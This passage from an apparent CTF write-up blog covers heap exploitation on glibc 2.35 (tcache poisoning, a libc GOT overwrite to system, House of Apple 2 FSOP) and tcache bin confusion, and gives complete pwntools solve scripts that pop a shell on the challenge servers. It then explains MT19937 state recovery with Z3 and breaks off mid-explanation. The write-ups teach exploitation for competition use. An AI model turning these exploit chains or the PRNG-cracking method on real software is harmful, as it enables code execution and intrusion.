strlen\u0026rsquo;s GOT entry inside libc with system. This works because puts() internally calls strlen() to determine the string length.\nAfter obtaining the same libc and heap leaks (phases 1-3), the endgame is:\n# Tcache poison targeting strlen\u0026#39;s ifunc GOT slot in libc strlen_got = libc.got[\u0026#39;strncpy\u0026#39;] # strncpy and strlen GOT entries are adjacent poisoned_fd = mangler ^ strlen_got Same tcache poisoning setup as the FSOP approach (two 0x30 entries, overflow to corrupt fd), but instead of pointing at _IO_list_all, we point at libc\u0026rsquo;s internal GOT. 
The two qwords at libc.got['strncpy'] are the resolved ifunc entries for strncpy and strlen:\ncreate(io, 1, 0x20, b\u0026#39;/bin/sh\\x00\u0026#39;) # consumes first tcache entry, note1 = \u0026#34;/bin/sh\u0026#34; delete(io, 0) create(io, 0, 0x20, p64(libc.sym[\u0026#39;strncpy\u0026#39;]) + # preserve strncpy\u0026#39;s resolved address p64(libc.sym[\u0026#39;system\u0026#39;]) # overwrite strlen -\u0026gt; system ) Now strlen points to system. The trigger:\nshow(io, 1) # puts(\u0026#34;/bin/sh\u0026#34;) -\u0026gt; strlen(\u0026#34;/bin/sh\u0026#34;) -\u0026gt; system(\u0026#34;/bin/sh\u0026#34;) flowchart LR P[\"puts('/bin/sh')\"] --\u003e|\"calls internally\"| G[\"libc GOT: strlen\"] G --\u003e|\"resolved to\"| S[\"system('/bin/sh')\"] style P fill:#2d333b,stroke:#444 style G fill:#5a3a1e,stroke:#d29922 style S fill:#6e3630,stroke:#f85149 That\u0026rsquo;s it. No fake FILE structs, no wide vtables, no exit trigger. Just a single function pointer swap. This works because libc.so.6 on Ubuntu 22.04 (glibc 2.35) has Partial RELRO, leaving the ifunc GOT entries writable at libc.got['strncpy'] and libc.got['strlen'], just above the read-only RELRO boundary.\nSolve scripts # House of Apple 2 FSOP from pwn import * context.arch = \u0026#39;amd64\u0026#39; exe = ELF(\u0026#39;./chall_patched\u0026#39;, checksec=False) libc = ELF(\u0026#39;./libc.so.6\u0026#39;, checksec=False) context.binary = exe mangle = lambda ptr, pos: ptr ^ (pos \u0026gt;\u0026gt; 12) def create(io, idx, size, data): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;Size: \u0026#39;, str(size).encode()) io.sendafter(b\u0026#39;Data: \u0026#39;, data) def delete(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) def show(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, 
b\u0026#39;3\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) return io.recvline(keepends=False) UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) io = remote(\u0026#39;chall.lac.tf\u0026#39;, 31144) if args.REMOTE else process([exe.path]) # ── Phase 1: Fill tcache[0x200] + push one to unsorted bin ── for i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 0) overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) overflow += p64(0x20) + p64(0x201) overflow += b\u0026#39;A\u0026#39; * 0x18 overflow += p64(0x20d31 - i * 0x20) if i == 7: overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) delete(io, 1) delete(io, 0) # ── Phase 2: Libc leak ── create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD log.info(f\u0026#39;{hex(libc.address)=}\u0026#39;) # ── Phase 3: Heap leak ── unsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) log.info(f\u0026#39;{hex(mangler)=}\u0026#39;) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21)) # ── Phase 4: Tcache poisoning → _IO_list_all + fake FILE ── heap_base = mangler \u0026lt;\u0026lt; 12 io_list_all = libc.sym[\u0026#39;_IO_list_all\u0026#39;] io_wfile_jumps = libc.sym[\u0026#39;_IO_wfile_jumps\u0026#39;] # Set up two 0x30 tcache entries for poisoning delete(io, 0) create(io, 0, 0x20, b\u0026#39;X\u0026#39; * 0x18) # 0x30 chunk from top (heap+0x3B0) create(io, 1, 0x20, b\u0026#39;Y\u0026#39; * 0x18) # 0x30 chunk from top 
(heap+0x3E0) delete(io, 1) # tcache[0x30]: heap+0x3E0 delete(io, 0) # tcache[0x30]: heap+0x3B0 → heap+0x3E0 # Build fake FILE struct fake_file_addr = heap_base + 0x420 wide_data_addr = fake_file_addr + 0xe8 wide_vtable_addr = wide_data_addr + 0xe8 fp = FileStructure() fp.flags = u64(b\u0026#39; sh\\x00\\x00\\x00\\x00\\x00\u0026#39;) fp._IO_buf_base = 0 fp._lock = fake_file_addr + 0xe0 fp._wide_data = wide_data_addr fp.vtable = io_wfile_jumps mode_bytes = bytearray(48) mode_bytes[0x18:0x1c] = p32(1) fp.unknown2 = bytes(mode_bytes) wide_data = flat({ 0x18: p64(0), 0x20: p64(1), 0x30: p64(0), 0xe0: p64(wide_vtable_addr), }, filler=b\u0026#39;\\x00\u0026#39;, length=0xe8) wide_vtable = flat({ 0x68: p64(libc.sym[\u0026#39;system\u0026#39;]), }, filler=b\u0026#39;\\x00\u0026#39;, length=0x70) # Overflow: poison tcache + embed fake FILE structs # note0\u0026#39;s 0x30 chunk is at heap+0x3B0, note1\u0026#39;s at heap+0x3E0 o2 = flat({ 0x110: p64(0) + p64(0x31), # note0 chunk header 0x120: p64(mangle(io_list_all, heap_base + 0x3C0)), # poisoned fd 0x140: p64(0) + p64(0x31), # note1 chunk header 0x150: p64(mangle(0, heap_base + 0x3F0)), # fd → NULL 0x180: bytes(fp), # fake FILE at heap+0x420 0x268: wide_data, # fake _wide_data 0x350: wide_vtable, # fake wide vtable }, filler=b\u0026#39;\\x00\u0026#39;, length=0x3C0) create(io, 0, 4, o2) # ── Phase 5: Trigger FSOP ── delete(io, 0) create(io, 0, 0x20, b\u0026#39;Z\u0026#39; * 0x18) # consume first tcache[0x30] entry # Second malloc returns _IO_list_all, write fake_file_addr # Pad to 0x18 bytes so read() doesn\u0026#39;t consume the exit command create(io, 1, 0x20, p64(fake_file_addr).ljust(0x18, b\u0026#39;\\x00\u0026#39;)) # exit() → _IO_flush_all → FSOP → system(\u0026#34; sh\u0026#34;) io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;4\u0026#39;) io.sendline(b\u0026#39;echo PWNED\u0026#39;) io.recvuntil(b\u0026#39;PWNED\u0026#39;, timeout=3) log.success(\u0026#39;Got shell!\u0026#39;) io.sendline(b\u0026#39;cat 
/app/flag.txt\u0026#39;) io.interactive() libc GOT overwrite (intended) # The intended solution, much shorter since there\u0026rsquo;s no FILE struct construction:\nfrom pwn import * context.arch = \u0026#39;amd64\u0026#39; exe = ELF(\u0026#39;./chall_patched\u0026#39;, checksec=False) libc = ELF(\u0026#39;./libc.so.6\u0026#39;, checksec=False) context.binary = exe UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) mangle = lambda ptr, pos: ptr ^ (pos \u0026gt;\u0026gt; 12) def create(io, idx, size, data): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;Size: \u0026#39;, str(size).encode()) io.sendafter(b\u0026#39;Data: \u0026#39;, data) def delete(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) def show(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;3\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) return io.recvline(keepends=False) io = remote(\u0026#39;chall.lac.tf\u0026#39;, 31144) if args.REMOTE else process([exe.path]) # ── Phase 1: Fill tcache[0x200] + push one to unsorted bin ── for i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 0) overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) overflow += p64(0x20) + p64(0x201) overflow += b\u0026#39;A\u0026#39; * 0x18 overflow += p64(0x20d31 - i * 0x20) if i == 7: overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) delete(io, 1) delete(io, 0) # ── Phase 2: Libc leak ── create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD log.info(f\u0026#39;{hex(libc.address)=}\u0026#39;) # ── Phase 3: Heap 
leak ── unsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) log.info(f\u0026#39;{hex(mangler)=}\u0026#39;) # Fix freed chunk header delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21)) # ── Phase 4: Tcache poisoning → strlen GOT ── delete(io, 0) create(io, 0, 0x20, b\u0026#39;X\u0026#39; * 0x18) create(io, 1, 0x20, b\u0026#39;Y\u0026#39; * 0x18) delete(io, 1) delete(io, 0) # Overflow: poison tcache fd to point at libc\u0026#39;s strlen GOT strlen_got = libc.got[\u0026#39;strncpy\u0026#39;] # strncpy and strlen GOT entries are adjacent create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x118 + p64(0x31) + p64(mangle(strlen_got, mangler \u0026lt;\u0026lt; 12)) + b\u0026#39;\\x00\u0026#39;) # null byte to pass tcache key check # Consume poisoned tcache create(io, 1, 0x20, b\u0026#39;/bin/sh\\x00\u0026#39;) # first pop: normal chunk delete(io, 0) create(io, 0, 0x20, # second pop: libc GOT! 
p64(libc.sym[\u0026#39;strncpy\u0026#39;]) + # preserve strncpy p64(libc.sym[\u0026#39;system\u0026#39;])) # overwrite strlen -\u0026gt; system # ── Trigger: puts(\u0026#34;/bin/sh\u0026#34;) → strlen → system ── show(io, 1) io.interactive() Flag # lactf{omg_arb_overflow_is_so_powerful} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/tcademy/","section":"CTFs","summary":"Heap exploitation on glibc 2.35: integer underflow to massive heap overflow, and two paths to shell: libc GOT overwrite or House of Apple 2 FSOP.","title":"Tcademy","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/type-confusion/","section":"Tags","summary":"","title":"Type-Confusion","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/topics/web/","section":"Topics","summary":"Web exploitation, logic bugs, and application vulnerabilities.","title":"Web","type":"topics"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/yaml/","section":"Tags","summary":"","title":"Yaml","type":"tags"},{"content":"I believe I\u0026rsquo;m not that good at math at this point\u0026hellip;\nnc ahc.ctf.pascalctf.it 9003 A player management system with create, delete, and print operations. 
The goal: overwrite a global target variable from 0xbabebabebabebabe to 0xdeadbeefcafebabe.\nProtections: Full RELRO Stack Canary NX enabled PIE enabled Full protections, so we need a heap attack.\nSetup # The binary pre-allocates 5 chunks of size 0x48 (fitting in 0x50 tcache bin), frees them all, then allocates target:\nvoid setup_chall() { for (int i = 0; i \u0026lt; 5; i++) players[i] = malloc(0x48); for (int i = 4; i \u0026gt;= 0; i--) { free(players[i]); players[i] = 0; } target = malloc(8); *target = 0xbabebabebabebabe; } After setup, the heap looks like:\n[chunk0:0x50][chunk1:0x50][chunk2:0x50][chunk3:0x50][chunk4:0x50][target:0x20][top] └──────────────────── tcache[0x50] ────────────────────────┘ The 5 freed chunks are in tcache, and target sits right after them.\nThe vulnerability # Creating a player allocates extra + 0x48 bytes, reads a name, then reads a message:\nvoid create_player() { int extra = read_int(0, 0x20); // 0-32 void *chunk = malloc(extra + 0x48); int name_len = read_name(chunk, extra); // max length: extra + 39 if (name_len \u0026lt;= extra + 0x1f) name_len = extra + 0x20; read_message(chunk + name_len); // message written at offset name_len } The bug: with extra=0, the chunk is 0x48 bytes. If we use a max-length name (39 chars), name_len becomes 40 (0x28). The message starts at offset 0x28, leaving only 0x48 - 0x28 = 0x20 (32) bytes before we overflow into the next chunk\u0026rsquo;s metadata.\nThe message can be up to 39 bytes, so we can overflow by 7 bytes into the adjacent chunk\u0026rsquo;s size field.\nThe attack # Tcache bin confusion # The idea: corrupt a chunk\u0026rsquo;s size field so when it\u0026rsquo;s freed, it goes into the wrong tcache bin. Then reallocate it as a larger chunk that overlaps with target.\nStep by step # 1. 
Consume tcache entries\nfor i in range(3): create(i, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) Takes chunks 0-2 from tcache[0x50]:\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (free) │ (free) │ 0xbabe..│ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ └── tcache[0x50] ──┘ 2. Corrupt chunk4\u0026rsquo;s size\ncreate(3, 0, b\u0026#39;A\u0026#39;*39, b\u0026#39;B\u0026#39;*32 + p32(0x71)) Gets chunk3 from tcache. With a 39-byte name, message starts at offset 0x28. We write 32 \u0026lsquo;B\u0026rsquo;s (fills the remaining 0x20 bytes) plus p32(0x71) which overflows into chunk4\u0026rsquo;s header:\nchunk3 layout (0x50 total, 0x48 user data): ┌──────────────────────────────────────────────────┬─────────────────┐ │ chunk3 user data │ chunk4 header │ ├───────────────────────┬──────────────────────────┼────────┬────────┤ │ name (39 \u0026#39;A\u0026#39;s + null) │ message (32 \u0026#39;B\u0026#39;s + 0x71) │prevsize│ size │ │ offset 0x00 │ offset 0x28 │ │= 0x71! │ └───────────────────────┴──────────────────────────┴────────┴────────┘ overflow ───────────────┘ chunk4\u0026rsquo;s size field is now 0x71 instead of 0x51.\n3. Allocate chunk4 normally\ncreate(4, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) Gets chunk4 from tcache. Tcache doesn\u0026rsquo;t validate size during allocation, so this works fine.\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (used) │ (used) │ 0xbabe..│ │ │ │ │ │ size=71!│ │ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ tcache[0x50]: empty tcache[0x70]: empty 4. Free chunk4 into wrong bin\ndelete(4) When freeing, glibc reads the chunk\u0026rsquo;s size field to determine which bin. 
chunk4 has size 0x71, so it goes to tcache[0x70]:\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (used) │ (free) │ 0xbabe..│ │ │ │ │ │ size=71 │ │ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ tcache[0x50]: empty tcache[0x70]: chunk4 ← wrong bin! 5. Reallocate as larger chunk\ncreate(4, 32, b\u0026#39;A\u0026#39;, p64(0xdeadbeefcafebabe)*4) With extra=32, we request 32 + 0x48 = 0x68 bytes, which needs a 0x70 chunk. malloc returns chunk4 from tcache[0x70].\nThe program thinks chunk4 is 0x70 bytes, but it\u0026rsquo;s still at its original position. This \u0026ldquo;larger\u0026rdquo; view extends into target\u0026rsquo;s memory:\nWhat the program thinks chunk4 looks like: ┌────────────────────────────────────────────────────────────────────┐ │ chunk4 as 0x70 chunk │ │ (0x60 user data) │ ├───────────────────────┬────────────────────────────────────────────┤ │ name (short) │ message written here... │ │ │ ...overwrites target! │ └───────────────────────┴────────────────────────────────────────────┘ Actual memory layout: ┌─────────────────────────────────────┬─────────────────────────────┐ │ real chunk4 (0x50) │ target chunk (0x20) │ ├─────────────────────────────────────┼──────────┬──────────────────┤ │ user data │ metadata │ *target value │ │ │ │← overwritten! │ └─────────────────────────────────────┴──────────┴──────────────────┘ The message payload p64(0xdeadbeefcafebabe)*4 (32 bytes) overwrites target\u0026rsquo;s value.\n6. Win\ncheck_target() *target is now 0xdeadbeefcafebabe. 
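The bin selection in step 4 can be sanity-checked numerically. Here is my own sketch of glibc's size-to-index mapping (mirroring `chunksize` and `csize2tidx` from malloc.c for 64-bit glibc; the names come from glibc, not from the challenge):

```python
MINSIZE = 0x20          # smallest chunk on 64-bit glibc
MALLOC_ALIGNMENT = 0x10

def chunksize(size_field):
    # free() masks off the PREV_INUSE / IS_MMAPPED / NON_MAIN_ARENA flag bits
    return size_field & ~0x7

def csize2tidx(csz):
    # glibc's mapping from chunk size to tcache bin index
    return (csz - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

# original chunk4 header (0x51) files under the 0x50 bin...
assert csize2tidx(chunksize(0x51)) == csize2tidx(0x50) == 3
# ...but after the overwrite (0x71) it files under the 0x70 bin,
# the same bin a request of 32 + 0x48 = 0x68 bytes is served from
assert csize2tidx(chunksize(0x71)) == csize2tidx(0x70) == 5
```

Nothing on the allocation path re-checks that the chunk really has the size its bin implies, which is exactly what the confusion exploits.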
Flag!\nSolve # from pwn import * context.binary = bin = ELF(\u0026#39;./average\u0026#39;, checksec=False) io = remote(\u0026#39;ahc.ctf.pascalctf.it\u0026#39;, 9003) # io = process([bin.path]) def create(idx, extra, name, msg): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;? \u0026#39;, str(extra).encode()) io.sendlineafter(b\u0026#39;: \u0026#39;, name) io.sendlineafter(b\u0026#39;: \u0026#39;, msg) def delete(idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;: \u0026#39;, str(idx).encode()) def check(): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;5\u0026#39;) # Consume tcache[0x50] entries for i in range(3): create(i, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) # Overflow from chunk3 to corrupt chunk4\u0026#39;s size (0x51 -\u0026gt; 0x71) create(3, 0, b\u0026#39;A\u0026#39;*39, b\u0026#39;B\u0026#39;*32 + p32(0x71)) # Allocate chunk4 (corrupted size) create(4, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) # Free chunk4 -\u0026gt; goes to tcache[0x70] delete(4) # Reallocate as 0x70 chunk, message overwrites target create(4, 32, b\u0026#39;A\u0026#39;, p64(0xdeadbeefcafebabe)*4) check() io.interactive() ","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/ahc/","section":"CTFs","summary":"Tcache bin confusion via chunk size corruption.","title":"AHC - Average Heap Challenge","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/chunk-size-corruption/","section":"Tags","summary":"","title":"Chunk-Size-Corruption","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/topics/crypto/","section":"Topics","summary":"Cryptography challenges, attacks, and implementations.","title":"Crypto","type":"topics"},{"content":"","date":"1 February 
2026","externalUrl":null,"permalink":"/writeups/tags/mt19937/","section":"Tags","summary":"","title":"Mt19937","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/","section":"CTFs","summary":"","title":"PascalCTF 2026","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/prng/","section":"Tags","summary":"","title":"Prng","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/smt-solver/","section":"Tags","summary":"","title":"Smt-Solver","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/tcache/","section":"Tags","summary":"","title":"Tcache","type":"tags"},{"content":" Bored in class? Try this cryptic Wordle twist and crack the next word!\nnc wordy.ctf.pascalctf.it 5005 The challenge implements a Wordle-style game where secret words are generated by an MT19937 PRNG. To obtain the flag, we must correctly predict 5 consecutive future secrets. The twist: we only observe 20 bits of each 32-bit RNG output.\nThe attack at a high level # The core idea is simple: MT19937 is deterministic. If we can figure out its internal state, we can predict all future outputs.\nThe problem is we don\u0026rsquo;t see the full outputs. Each secret word encodes only 20 of the 32 bits the RNG produces:\ndef new_secret(): out = rng.next_u32() # 32-bit output idx = out \u0026amp; ((1 \u0026lt;\u0026lt; 20) - 1) # keep only lower 20 bits current_secret = index_to_word(idx) So we\u0026rsquo;re missing 12 bits per output. Can we still recover the state?\nYes, because MT19937\u0026rsquo;s state is heavily constrained by its structure. Even partial observations, if we collect enough of them, uniquely determine the state. 
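For contrast: when full 32-bit outputs are visible, no solver is needed at all. The classic attack untempers 624 consecutive outputs and clones the generator directly — a standard trick, sketched here (my own code, not the writeup's) against Python's `random`, which is MT19937. It fails for this challenge because 12 bits of every output are hidden:

```python
import random

def untemper(y):
    # Invert the four tempering steps (each is an invertible XOR-shift).
    def inv_right(v, s):
        x = v
        for _ in range(32 // s + 1):
            x = v ^ (x >> s)
        return x
    def inv_left(v, s, m):
        x = v
        for _ in range(32 // s + 1):
            x = v ^ ((x << s) & m)
        return x
    y = inv_right(y, 18)
    y = inv_left(y, 15, 0xEFC60000)
    y = inv_left(y, 7, 0x9D2C5680)
    return inv_right(y, 11)

outputs = [random.getrandbits(32) for _ in range(624)]
state = [untemper(o) for o in outputs]
clone = random.Random()
clone.setstate((3, tuple(state + [624]), None))  # index 624 = "state exhausted"
assert all(clone.getrandbits(32) == random.getrandbits(32) for _ in range(100))
```

With only 20 of 32 bits per output, untempering a single word is underdetermined, which is why the Z3 route treats the whole state symbolically instead.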
We use Z3 (an SMT solver) to find a state consistent with all our observations.\nHow MT19937 works # MT19937 maintains 624 32-bit words as internal state, plus an index tracking the current position.\nGenerating output # When you call next_u32(), it:\nReads state[index] Applies a \u0026ldquo;tempering\u0026rdquo; transformation (reversible bit scrambling) Increments the index def next_u32(self): if self.index \u0026gt;= 624: self.twist() # regenerate state when exhausted y = self.mt[self.index] self.index += 1 # Tempering: reversible bit scrambling y ^= (y \u0026gt;\u0026gt; 11) y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) y ^= ((y \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) y ^= (y \u0026gt;\u0026gt; 18) return y The twist operation # After 624 outputs, the state is exhausted and gets regenerated via \u0026ldquo;twist\u0026rdquo;:\ndef twist(self): for i in range(624): # Combine upper bit of state[i] with lower 31 bits of state[i+1] y = (self.mt[i] \u0026amp; 0x80000000) | (self.mt[(i + 1) % 624] \u0026amp; 0x7FFFFFFF) # XOR with state[i+397] and conditional term self.mt[i] = self.mt[(i + 397) % 624] ^ (y \u0026gt;\u0026gt; 1) if y \u0026amp; 1: self.mt[i] ^= 0x9908B0DF self.index = 0 The key observation: every operation here is XOR, AND with constants, or bit shifts. No multiplication, no addition that carries between bits. This makes the entire system linear over individual bits.\nWhy partial observations are enough # Here\u0026rsquo;s the crucial insight that makes this attack work.\nTracing bits through tempering # Let\u0026rsquo;s trace exactly what happens to the bits. Say state word mt[0] has bits we\u0026rsquo;ll call b31, b30, ..., b0. The first tempering step is:\ny = mt[0] y ^= (y \u0026gt;\u0026gt; 11) What does y ^= (y \u0026gt;\u0026gt; 11) do to each bit position?\nBefore: b31 b30 b29 ... b21 b20 b19 b18 ... b11 b10 ... b0 Shifted: 0 0 0 ... 0 b31 b30 b29 ... b22 b21 ... b11 XOR: b31 b30 b29 ... b21 X X X ... X X ... 
X where X means \u0026#34;XOR of two bits\u0026#34; So after this step:\nBit 20 of the output = b20 XOR b31 Bit 19 of the output = b19 XOR b30 Bit 10 of the output = b10 XOR b21 Bits 21-31 are unchanged (nothing shifts into them) Each subsequent tempering step (y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; MASK), etc.) does more mixing, but it\u0026rsquo;s always XORing bits together. After all tempering steps, each output bit is the XOR of some specific subset of the original state bits.\nFrom bits to equations # Here\u0026rsquo;s where it becomes useful. Suppose after all tempering, output bit 5 equals b17 XOR b8 XOR b3 (I\u0026rsquo;m making up the exact combination, the real one depends on all the tempering steps).\nIf we observe that output bit 5 = 1, we now know:\nb17 XOR b8 XOR b3 = 1 That\u0026rsquo;s an equation! It tells us an odd number of these three state bits must be 1: either exactly one of them is 1, or all three are.\nEach observed bit gives us one such equation. If we observe 20 bits of output, we get 20 equations constraining the state bits.\nWhy XOR makes this \u0026ldquo;linear\u0026rdquo; # XOR has a nice property: it behaves like addition where 1+1=0 (arithmetic modulo 2). This means our equations are linear: no bit is multiplied by another bit, bits are only added (XORed) together.\nLinear systems can be solved efficiently. Given enough equations, you can solve for all unknowns using Gaussian elimination (or in our case, Z3 does something equivalent).\nIf tempering used AND or OR in ways that weren\u0026rsquo;t masked to constants, we\u0026rsquo;d get nonlinear equations like b5 AND b3 = 1, which are much harder to solve in bulk.\nCounting constraints vs unknowns # The full state is 624 × 32 = 19968 bits. That\u0026rsquo;s what we need to determine.\nEach observation gives us 20 bits of output. Each bit is one linear equation constraining the state. 
So:\n624 observations → 624 × 20 = 12480 constraints (not enough) 1000 observations → 1000 × 20 = 20000 constraints (just enough) But raw constraint count isn\u0026rsquo;t the whole story. We also need the constraints to be independent, meaning they need to tell us different things about the state.\nWhy the twist helps # Before the twist, output \\(i\\) comes directly from state[i] (through tempering). Each observation only constrains bits of a single state word. If we only collected 624 observations from epoch 0, each state word would have 20 known bits and 12 unknown bits, with no way to pin down those 12 bits.\nAfter the twist, everything changes. Look at how twisted state is computed:\ntwisted[i] = state[(i + 397) % 624] ^ (y \u0026gt;\u0026gt; 1) ^ ... # where y combines state[i] and state[i+1] So twisted[i] depends on bits from state[i], state[i+1], AND state[(i+397) % 624]. Three different original state words get mixed together.\nWhen we observe output 624 (first output after twist), we\u0026rsquo;re constraining a linear combination of bits from multiple original state words. These cross-word constraints tie the whole state together into a connected system.\nWith observations spanning two twist boundaries (outputs 0-623, 624-1247, 1248+), we get a dense web of constraints where each state word is linked to many others. This makes the system fully determined despite only seeing 20 bits per output.\nWhy Z3 works here # Z3\u0026rsquo;s bitvector solver is essentially doing Gaussian elimination on a system of linear equations over bits. This isn\u0026rsquo;t brute force, it\u0026rsquo;s \\(O(n^3)\\) linear algebra, which is fast even for 20000 equations.\nIf MT19937 used multiplication or other nonlinear operations, Z3 would have to fall back to SAT solving, which could take exponential time. The linearity is what makes this tractable.\nSolving Wordle efficiently # Before recovering the RNG state, we need to extract the secrets. 
Brute-forcing all \(16^5\) possibilities per round is infeasible, but the Wordle feedback mechanism enables rapid narrowing.\nLetter enumeration strategy # We probe each letter by guessing 5 copies. For a guess like aaaaa against secret abcda:\nFeedback: G___G Every a in the secret shows as G (green) at its exact position This means we don\u0026rsquo;t actually need Yellow feedback at all. Greens tell us both which letters appear and where they are. After probing all 16 letters, we know every position for each letter. The remaining unknowns are just permutations of letters that could fit multiple positions.\nBatch sending # A key optimization: send all guesses at once instead of waiting for each response. With 1260 rounds of Wordle over a network connection, round-trip latency adds up fast.\n# Send all 16 letter probes in one batch guesses = [f\u0026#34;GUESS {c * 5}\u0026#34; for c in ALPHABET] io.sendline(\u0026#34;\\n\u0026#34;.join(guesses).encode()) # Then read all 16 responses for c in ALPHABET: fb = io.recvline().decode().split()[1] # process feedback... Same idea for candidate permutations: generate them all, send them in one batch, then scan the responses for GGGGG.\nZ3-based state recovery # What is Z3? # Z3 is an SMT (Satisfiability Modulo Theories) solver, a tool that finds values satisfying a set of constraints, or proves no solution exists.\nThe key idea is symbolic computation: instead of calculating with concrete numbers, we describe operations on unknown variables and let Z3 figure out what those variables must be. This lets us \u0026ldquo;run MT19937 backwards\u0026rdquo;: we know the outputs, and Z3 finds the state that produced them.\nWhat \u0026ldquo;symbolic\u0026rdquo; actually means # When we write normal Python:\nx = 5 y = x ^ 3 # y is now 6 Python computes 5 ^ 3 = 6 immediately. The variable y holds the concrete value 6.\nZ3 works differently. 
